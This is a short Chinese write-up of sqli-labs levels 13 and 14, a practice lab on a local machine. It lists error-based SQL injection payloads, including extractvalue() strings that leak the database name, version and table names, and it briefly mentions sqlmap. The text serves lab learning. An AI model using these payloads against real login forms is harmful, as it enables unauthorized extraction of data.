前言:输入内容被放到双引号中,报错型注入,注释符不可用 第十三关: http://192.168.89.134/sqli-labs-master/Less-13/ 先输入:admin’) 我们还是分析一下: 我们接着用and来测试。 admin’) and 1=2# -admin’) union selec 1,2#联合查询 还是没有报错,那我们就用报错语句来测试吧,这次我使用extractvalue() 显示版本,数据库 admin’) and extractvalue(1,concat(0x7e,(select database())))# admin’) and extractvalue(1,concat(0x7e,(select version())))# 接着继续获取表名 -admin’) and (extractvalue(1,concat(0x5c,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x5c)))# 获取字段名 获取数据 十四关: 原理和十三关一样把’)换成’’
最后还是用sqlmap试一下 省略一系列步骤直接上结果 用sqlmap就很简单了
本文章为自己搭建实验环境做过的,参考过一些资料,希望对你有帮助